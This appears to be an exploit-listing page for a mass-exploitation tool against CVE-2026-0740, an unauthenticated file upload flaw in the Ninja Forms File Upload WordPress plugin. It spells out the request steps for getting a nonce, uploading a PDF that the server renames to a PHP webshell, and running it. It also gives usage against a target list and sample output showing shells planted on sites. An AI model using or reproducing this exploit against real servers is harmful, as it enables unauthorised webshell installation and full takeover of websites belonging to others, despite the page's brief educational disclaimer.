Share
## https://sploitus.com/exploit?id=9C3B812C-BAD2-53CB-8A4A-439A70A9B10D
# CVE-2026-0740 : Ninja Forms - File Upload <= 3.3.26 Unauthenticated Arbitrary File Upload.
### Description :
The Ninja Forms - File Uploads plugin for WordPress is vulnerable to unauthenticated arbitrary file upload due to missing file type
validation and missing capability checks in the 'NF_FU_AJAX_Controllers_Uploads::handle_upload' function in all versions up to, and including, 3.3.26
This flaw allows unauthenticated attackers to:
- Generate valid nonce for ANY field_id.
- Upload arbitrary files using whitelist bypass technique.
- Force server-side rename from whitelisted extension (.pdf) to PHP extension.
- The uploaded webshell will be stored at:
β /wp-content/uploads/ninja-forms/tmp/
- Achieve Remote Code Execution (RCE) on the affected server.
# INFO : [**CVE-2026-0740**](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ninja-forms-uploads/ninja-forms-file-upload-3326-unauthenticated-arbitrary-file-upload)
~ **CVSS Score: 9.8 (Critical)**
~ **Affected Versions: <= 3.3.26**
- Researcher : [**SΓ©lim Lanouar-(whattheslime)**](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/selim-lanouar)
## Attack Vector
```bash
Step 1: Get Nonce
ββββββββββββββββββββββββββββββββββββ
POST /wp-admin/admin-ajax.php
Data: action=nf_fu_get_new_nonce&field_id=7&form_id=7
Response: {"success":true,"data":{"nonce":"7a850757a1"}}
β
βΌ
Step 2: Upload Disguised File + Rename to PHP
ββββββββββββββββββββββββββββββββββββββββββββββ
POST /wp-admin/admin-ajax.php
Data:
- action=nf_fu_upload
- nonce=7a850757a1
- field_id=7
- form_id=7
- files-7=@doc.pdf (whitelisted extension)
- doc_pdf=shadow.php (rename target)
β
βΌ
Step 3: Server Stores Malicious File
βββββββββββββββββββββββββββββββββββββ
Location: /wp-content/uploads/ninja-forms/tmp/shadow.php
Content: PHP shell (uploader / webshell)
β
βΌ
Step 4: execute uploaded file
ββββββββββββββββββββββββββββββββββββ
GET /wp-content/uploads/ninja-forms/tmp/shadow.php
β Execute webshell
β Full server takeover
```
```text
- Conclusions from field experiments:
1. The `nf_fu_get_new_nonce` endpoint returns a valid nonce without checking field existence
β No validation of `field_id` and `form_id` parameters (ANY random ID works)
2. Critical logical flaw in rename functionality
β Plugin accepts user-supplied filename via POST parameter
β No validation on final file extension after rename
3. Uploaded file lands directly in web-accessible directory
β /wp-content/uploads/ninja-forms/tmp/
4. The owner of this tool is very handsome
```
### features :
- automatically fetch nonce
- Exploit With Default ID
- Error Handling
- Auto-save results to shell.txt
## Usage :
- make sure filename is list.txt and is in the directory
- python/python3 shadow.py
## Output :
```bash
Λβ±πͺ·β°Λ NINJA FORMS MASS EXPLOITER Λβ±πͺ·β°Λ
β°ββ€ Full response display
[+] Loaded 100 targets
[1/100]
π [FRISKA RESEARCHER] Attack on: https://example.com
[*] Getting nonce...
[*] HTTP Status: 400
[*] Response: 0
[-] HTTP Error: 400
[2/100]
π [FRISKA RESEARCHER] Attack on: https://www.test.com
[*] Getting nonce...
[*] HTTP Status: 200
[*] Response: {"success":true,"data":{"nonce":"b0404ec210","nonce_expiry":1775648146}}
[+] Nonce: b0404ec210
[*] Uploading shell...
[*] Upload response: {"data":{"files":[{"name":"doc.pdf","full_path":"doc.pdf","type":"application\/pdf","tmp_name":"shadow.php","error":0,"size":246,"new_tmp_key":"doc_pdf"}]},"errors":[],"debug":[]}
============================================================
π₯ SHELL UPLOADER: https://www.test.com/wp-content/uploads/ninja-forms/tmp/shadow.php
============================================================
```
## This tool is for educational and security testing purposes only.
Unauthorized use of systems you don't own or don't have permission to test is illegal.